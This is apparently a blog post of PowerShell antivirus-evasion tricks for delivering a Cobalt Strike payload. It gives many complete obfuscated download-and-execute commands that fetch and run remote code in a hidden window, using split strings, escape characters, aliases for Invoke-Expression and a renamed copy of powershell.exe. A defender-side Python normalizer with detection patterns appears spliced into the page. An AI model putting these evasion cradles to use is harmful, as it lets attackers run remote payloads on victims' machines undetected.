PowerShell bypass tips


Command EXEC

Prefix a string with & to run it as a command:
&"hostname"

IEX() / Invoke-Expression() command exec:
IEX("whoami")
Invoke-Expression("whoami")

Cobalt Strike online

The default payload looks like this:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'))"

It will certainly be killed by AV.

How to bypass

String split

IEX ((new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'))

IEX (('new-'+'object' net.webclient).'downl'+'oadstring'('http://192.168.159.6:6379/yangsir'))

Variable substitution

Default payload:
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'))"

Before replacement:
IEX ((new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'))

After:
IEX$test=new-object net.webclient; $test.downloadstring('http://192.168.159.6:6379/yangsir')

Or split the http string like this:
$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://192.168.159.6:6379/yangsir''))

Add escape characters

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).d`own`load`st`ring('http://192.168.159.6:6379/yangsir'))"

Combined use

Very easy to use, but a payload like this will be killed again:

powershell.exe -nop -w hidden -c "$t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4('http://192.168.159.6:6379/yangsir'')'.Replace('t4','adString');IEX($t1+$t2+$t3)"

powershell.exe -nop -w hidden -c "$t1='IEX ((new-object net.webclient).downl';$t2='oadstring(''http://192.168.159.6:6379/yangsir''))';$t3='$t1,$t2';IEX(-join $t3)"

powershell.exe $t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4('http://192.168.159.6:6379/yangsir'')'.Replace('t4','adString');IEX($t1+$t2+$t3)

powershell.exe $t1='IEX ((new-object net.webclient).downl';$t2='oadstring(''http://192.168.159.6:6379/yangsir''))';$t3='$t1,$t2';IEX(-join $t3)

Use an alias

Bypass AV:

powershell.exe set-alias -name test -value Invoke-Expression;test(New-Object Net.WebClient).DownloadString('http://192.168.159.6:6379/yangsir')

Another:
powershell.exe set-alias -name name1 -value Invoke-Expression;"$t1='name1((new-object net.webclient).downl';$t2='oannn(''http://192.168.159.6:6379/yangsir''))'.Replace('nnn','dString');$t3=$t1,$t2;$tfin=$t3;name1(-join $tfin)"

Copy powershell.exe

copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe whoami.txt

whoami.txt set-alias -name name1 -value Invoke-Expression;"$t1='name1((new-object net.webclient).downl';$t2='oannn(''http://192.168.159.6:6379/yangsir''))'.Replace('nnn','dString');$t3=$t1,$t2;$tfin=$t3;name1(-join $tfin)"

Overly long commands

You can also combine an overly long command, a copied powershell.exe and obfuscation.
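As an added, defender-side example (not code from the page or its author): a Python normalizer that undoes the tricks listed above (backtick escapes, 'a'+'b' joins, .Replace() on literals, $var fragments glued together later) before plain string rules run, with constructed sample command lines that mirror the page's payloads plus one benign command.

```python
import re

# Constructed sample command lines (not real telemetry); they mirror the
# obfuscation styles shown on this page, plus one benign command.
SAMPLES = [
    "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).d`own`load`st`ring('http://192.168.159.6:6379/yangsir'))\"",
    "powershell.exe -nop -w hidden -c \"$t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4(''http://192.168.159.6:6379/yangsir'')'.Replace('t4','adString');IEX($t1+$t2+$t3)\"",
    "powershell.exe set-alias -name test -value Invoke-Expression;test(New-Object Net.WebClient).DownloadString('http://192.168.159.6:6379/yangsir')",
    "powershell.exe -c \"Get-ChildItem C:\\Users | Select-Object Name\"",
]

# $var='literal'[.Replace('x','y')]; -- the fragment-assignment shape used above
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'(?:\.Replace\('([^']*)','([^']*)'\))?;?", re.I)
JOIN = re.compile(r"'\s*[+,]\s*'")          # 'a'+'b', and 'a','b' (array fed to -join)
OBFUSCATION = re.compile(r"`|'\s*\+\s*'|-join\b|\.replace\(|set-alias", re.I)
CONTENT = {                                  # matched against the normalized text
    "iex": r"\b(iex|invoke-expression)\b",
    "download-cradle": r"net\.webclient\)?\.downloadstring\(",
    "hidden-window": r"-w(indowstyle)?\s+hidden",
}

def normalize(cmd: str) -> str:
    """Undo the cheap obfuscations from this page so that plain string rules
    see the real command. Aliases defined in an earlier command are not
    visible here; correlating those needs script block logging."""
    s = cmd.replace("`", "")                 # d`own`load -> download
    assigned = {}
    def grab(m):                             # record $var -> resolved literal
        val = m.group(2).replace("''", "'")
        if m.group(3) is not None:           # apply .Replace('x','y') on the literal
            val = val.replace(m.group(3), m.group(4))
        assigned[m.group(1).lower()] = val
        return ""                            # drop the assignment itself
    s = ASSIGN.sub(grab, s)
    for name, val in assigned.items():       # inline every later use of $var
        s = re.sub(r"\$" + re.escape(name) + r"\b",
                   lambda m, v=val: "'" + v + "'", s, flags=re.I)
    return JOIN.sub("", s).replace("''", "'")  # glue the fragments back together

def classify(cmd: str) -> dict:
    """Content rules run on the normalized text; the obfuscation rule runs on
    the raw text, since normalization removes the artefacts it looks for."""
    norm = normalize(cmd).lower()
    hits = sorted(k for k, pat in CONTENT.items() if re.search(pat, norm))
    return {"hits": hits,
            "obfuscated": bool(OBFUSCATION.search(cmd)),
            "alert": "iex" in hits and "download-cradle" in hits}
```

The copied-binary trick under "Copy powershell.exe" leaves nothing to see in the command line, so match on the PE's original file name (for example Sysmon's OriginalFileName field) rather than on the image path.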

Author: Yangsir
Reprint policy: Unless otherwise stated, all articles in this blog are under the CC BY 4.0 reprint policy. If reproduced, please indicate the source: Yangsir!